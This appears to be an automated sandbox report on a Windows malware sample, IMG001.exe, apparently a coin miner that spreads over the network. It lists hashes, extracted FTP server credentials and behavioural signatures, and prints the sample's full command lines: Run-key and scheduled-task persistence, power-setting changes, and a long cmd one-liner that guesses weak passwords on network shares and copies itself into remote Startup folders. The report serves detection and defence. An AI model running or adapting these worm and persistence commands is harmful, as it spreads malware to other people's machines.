Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
25-09-2022 13:56
Static task
static1
Behavioral task
behavioral1
Sample
IMG001.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
IMG001.exe
Resource
win10v2004-20220812-en
General
-
Target
IMG001.exe
-
Size
3.5MB
-
MD5
87882046d21d2468ee993ea7c3159c4d
-
SHA1
525114e7e4bde3c2e9620f598dc21071888b44b6
-
SHA256
edc049f43e49ebc789a64818b7a1c52e37dd248e735d86606d92162dce599130
-
SHA512
bce07ca371c0a7aa6d214ff3ff3fb05c45891f56d1834c06a563b1adb0d1c3eee9829ac73b4652677ba916aa147913d135939d0d3a2f7af4aa1469af3389ffc6
-
SSDEEP
98304:M8LuVPnq1y5tQOM33ZNqCtBixHl54Oyjes1boo:KVPq1yLanrqTr43eSX
Malware Config
Extracted
Protocol: ftp- Host:
62.129.233.167 - Port:
21 - Username:
anonymous
Extracted
Protocol: ftp- Host:
107.151.181.121 - Port:
21 - Username:
admin - Password:
foster
Extracted
Protocol: ftp- Host:
112.230.136.19 - Port:
21 - Username:
anonymous
Signatures
-
Contacts a large (872) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 3 IoCs
Processes:
tftp.exeIMG001.exetftp.exepid process 3496 tftp.exe 32 IMG001.exe 3020 tftp.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
IMG001.exeIMG001.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation IMG001.exe -
Drops startup file 1 IoCs
Processes:
IMG001.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe -
Loads dropped DLL 5 IoCs
Processes:
IMG001.exepid process 32 IMG001.exe 32 IMG001.exe 32 IMG001.exe 32 IMG001.exe 32 IMG001.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
reg.exeIMG001.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run IMG001.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
IMG001.exedescription ioc process File opened (read-only) \??\E: IMG001.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\UAC.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_1 C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3660 schtasks.exe 4124 schtasks.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 4924 taskkill.exe 3788 taskkill.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
taskkill.exetaskkill.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4924 taskkill.exe Token: SeDebugPrivilege 3788 taskkill.exe Token: SeShutdownPrivilege 3428 powercfg.exe Token: SeCreatePagefilePrivilege 3428 powercfg.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeCreatePagefilePrivilege 1816 powercfg.exe Token: SeShutdownPrivilege 2088 powercfg.exe Token: SeCreatePagefilePrivilege 2088 powercfg.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
IMG001.execmd.exeIMG001.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4904 wrote to memory of 1676 4904 IMG001.exe cmd.exe PID 4904 wrote to memory of 1676 4904 IMG001.exe cmd.exe PID 4904 wrote to memory of 1676 4904 IMG001.exe cmd.exe PID 1676 wrote to memory of 4924 1676 cmd.exe taskkill.exe PID 1676 wrote to memory of 4924 1676 cmd.exe taskkill.exe PID 1676 wrote to memory of 4924 1676 cmd.exe taskkill.exe PID 4904 wrote to memory of 3496 4904 IMG001.exe tftp.exe PID 4904 wrote to memory of 3496 4904 IMG001.exe tftp.exe PID 4904 wrote to memory of 3496 4904 IMG001.exe tftp.exe PID 4904 wrote to memory of 32 4904 IMG001.exe IMG001.exe PID 4904 wrote to memory of 32 4904 IMG001.exe IMG001.exe PID 4904 wrote to memory of 32 4904 IMG001.exe IMG001.exe PID 32 wrote to memory of 5000 32 IMG001.exe cmd.exe PID 32 wrote to memory of 5000 32 IMG001.exe cmd.exe PID 32 wrote to memory of 5000 32 IMG001.exe cmd.exe PID 5000 wrote to memory of 3788 5000 cmd.exe taskkill.exe PID 5000 wrote to memory of 3788 5000 cmd.exe taskkill.exe PID 5000 wrote to memory of 3788 5000 cmd.exe taskkill.exe PID 32 wrote to memory of 3020 32 IMG001.exe tftp.exe PID 32 wrote to memory of 3020 32 IMG001.exe tftp.exe PID 32 wrote to memory of 3020 32 IMG001.exe tftp.exe PID 32 wrote to memory of 2488 32 IMG001.exe cmd.exe PID 32 wrote to memory of 2488 32 IMG001.exe cmd.exe PID 32 wrote to memory of 2488 32 IMG001.exe cmd.exe PID 32 wrote to memory of 3936 32 IMG001.exe cmd.exe PID 32 wrote to memory of 3936 32 IMG001.exe cmd.exe PID 32 wrote to memory of 3936 32 IMG001.exe cmd.exe PID 32 wrote to memory of 4268 32 IMG001.exe cmd.exe PID 32 wrote to memory of 4268 32 IMG001.exe cmd.exe PID 32 wrote to memory of 4268 32 IMG001.exe cmd.exe PID 32 wrote to memory of 2804 32 IMG001.exe cmd.exe PID 32 wrote to memory of 2804 32 IMG001.exe cmd.exe PID 32 wrote to memory of 2804 32 IMG001.exe cmd.exe PID 3936 wrote to memory of 3660 3936 cmd.exe schtasks.exe PID 3936 wrote to memory of 3660 3936 cmd.exe schtasks.exe PID 3936 wrote to memory of 3660 3936 cmd.exe schtasks.exe PID 2488 wrote to memory of 3324 2488 cmd.exe reg.exe PID 2488 wrote to memory of 3324 2488 cmd.exe reg.exe PID 2488 wrote to memory of 3324 2488 cmd.exe reg.exe PID 4268 wrote to memory of 4124 4268 cmd.exe schtasks.exe PID 4268 wrote to memory of 4124 4268 cmd.exe schtasks.exe PID 4268 wrote to memory of 4124 4268 cmd.exe schtasks.exe PID 2804 wrote to memory of 3428 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 3428 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 3428 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 1816 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 1816 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 1816 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 2088 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 2088 2804 cmd.exe powercfg.exe PID 2804 wrote to memory of 2088 2804 cmd.exe powercfg.exe PID 32 wrote to memory of 4512 32 IMG001.exe cmd.exe PID 32 wrote to memory of 4512 32 IMG001.exe cmd.exe PID 32 wrote to memory of 4512 32 IMG001.exe cmd.exe PID 4512 wrote to memory of 3160 4512 cmd.exe cmd.exe PID 4512 wrote to memory of 3160 4512 cmd.exe cmd.exe PID 4512 wrote to memory of 3160 4512 cmd.exe cmd.exe PID 3160 wrote to memory of 4496 3160 cmd.exe net.exe PID 3160 wrote to memory of 4496 3160 cmd.exe net.exe PID 3160 wrote to memory of 4496 3160 cmd.exe net.exe PID 3160 wrote to memory of 548 3160 cmd.exe find.exe PID 3160 wrote to memory of 548 3160 cmd.exe find.exe PID 3160 wrote to memory of 548 3160 cmd.exe find.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\IMG001.exe"C:\Users\Admin\AppData\Local\Temp\IMG001.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ4⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0003⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\powercfg.exepowercfg /CHANGE -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\powercfg.exePowercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0004⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0008& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet view5⤵
- Discovers systems in the same network
-
C:\Windows\SysWOW64\find.exefind /i "\\"5⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\.htaccessFilesize
114B
MD51cd7834fb975e468fccc8f027f69a528
SHA156275eef952e6559b86a2cba0b9d45b0307f9dae
SHA25672e847a89d6a5e9e779ea2f6347b8780c0c0d72969f43777aa7ceb431bd3b024
SHA51214e5fdc4ee4d961f1da2272847d31ddd1559a36415f00a032ae71400956d897dbd88fd8c8d03aadad29888e729d5c5077d8620aec8e179440b0d5dce511f3338
-
C:\Users\Admin\AppData\Local\Temp\info.zipFilesize
1KB
MD58604e0f263922501f749cfca447b041a
SHA185c712bdeaceb78e2785e1f63811b0c4a50f952d
SHA25652ec3ba075a507e62bb6e3272fb13b30a8ddc0f62c4ea194311d558b338eb5ed
SHA512496d7a1b8b55d28387dad3f1c43e164bb567259c4cac21dd632ccd450dfbf28d431330c27ea72a5a8034979c325d19ff3fd8a3f7fc12b1122f67ef595630d5b2
-
C:\Users\Admin\AppData\Local\Temp\nsjC45B.tmp\inetc.dllFilesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
C:\Users\Admin\AppData\Local\Temp\nsjC45B.tmp\inetc.dllFilesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
C:\Users\Admin\AppData\Local\Temp\nsjC45B.tmp\inetc.dllFilesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
C:\Users\Admin\AppData\Local\Temp\nsjC45B.tmp\inetc.dllFilesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
C:\Users\Admin\AppData\Local\Temp\nsjC45B.tmp\inetc.dllFilesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
C:\Users\Admin\AppData\Local\Temp\tftp.exeFilesize
275KB
MD57a4774111ad45d5b306c8ca8c5aca376
SHA106d41d4f1fb72de905904f380efa564d0badbb91
SHA256dd082c17a55a54173f105a9c38a71126e4521541b4a56be55546ab965136b039
SHA51229acf0f9bc82465e13f668d0667a802a20e297ea0f16c74bef49ba28b3ed1b7392418c6afbcd165ad3ce6e1e01d13e09d26fab17700764bddb5ef0d870aa7af7
-
C:\Users\Admin\AppData\Local\Temp\tftp.exeFilesize
275KB
MD57a4774111ad45d5b306c8ca8c5aca376
SHA106d41d4f1fb72de905904f380efa564d0badbb91
SHA256dd082c17a55a54173f105a9c38a71126e4521541b4a56be55546ab965136b039
SHA51229acf0f9bc82465e13f668d0667a802a20e297ea0f16c74bef49ba28b3ed1b7392418c6afbcd165ad3ce6e1e01d13e09d26fab17700764bddb5ef0d870aa7af7
-
C:\Users\Admin\AppData\Local\Temp\tftp.exeFilesize
275KB
MD57a4774111ad45d5b306c8ca8c5aca376
SHA106d41d4f1fb72de905904f380efa564d0badbb91
SHA256dd082c17a55a54173f105a9c38a71126e4521541b4a56be55546ab965136b039
SHA51229acf0f9bc82465e13f668d0667a802a20e297ea0f16c74bef49ba28b3ed1b7392418c6afbcd165ad3ce6e1e01d13e09d26fab17700764bddb5ef0d870aa7af7
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exeFilesize
3.5MB
MD587882046d21d2468ee993ea7c3159c4d
SHA1525114e7e4bde3c2e9620f598dc21071888b44b6
SHA256edc049f43e49ebc789a64818b7a1c52e37dd248e735d86606d92162dce599130
SHA512bce07ca371c0a7aa6d214ff3ff3fb05c45891f56d1834c06a563b1adb0d1c3eee9829ac73b4652677ba916aa147913d135939d0d3a2f7af4aa1469af3389ffc6
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exeFilesize
3.5MB
MD587882046d21d2468ee993ea7c3159c4d
SHA1525114e7e4bde3c2e9620f598dc21071888b44b6
SHA256edc049f43e49ebc789a64818b7a1c52e37dd248e735d86606d92162dce599130
SHA512bce07ca371c0a7aa6d214ff3ff3fb05c45891f56d1834c06a563b1adb0d1c3eee9829ac73b4652677ba916aa147913d135939d0d3a2f7af4aa1469af3389ffc6
-
memory/32-137-0x0000000000000000-mapping.dmp
-
memory/548-164-0x0000000000000000-mapping.dmp
-
memory/1676-132-0x0000000000000000-mapping.dmp
-
memory/1816-154-0x0000000000000000-mapping.dmp
-
memory/2088-155-0x0000000000000000-mapping.dmp
-
memory/2488-146-0x0000000000000000-mapping.dmp
-
memory/2804-149-0x0000000000000000-mapping.dmp
-
memory/3020-143-0x0000000000000000-mapping.dmp
-
memory/3160-162-0x0000000000000000-mapping.dmp
-
memory/3324-151-0x0000000000000000-mapping.dmp
-
memory/3428-153-0x0000000000000000-mapping.dmp
-
memory/3496-134-0x0000000000000000-mapping.dmp
-
memory/3660-150-0x0000000000000000-mapping.dmp
-
memory/3788-141-0x0000000000000000-mapping.dmp
-
memory/3936-147-0x0000000000000000-mapping.dmp
-
memory/4124-152-0x0000000000000000-mapping.dmp
-
memory/4268-148-0x0000000000000000-mapping.dmp
-
memory/4496-163-0x0000000000000000-mapping.dmp
-
memory/4512-161-0x0000000000000000-mapping.dmp
-
memory/4924-133-0x0000000000000000-mapping.dmp
-
memory/5000-140-0x0000000000000000-mapping.dmp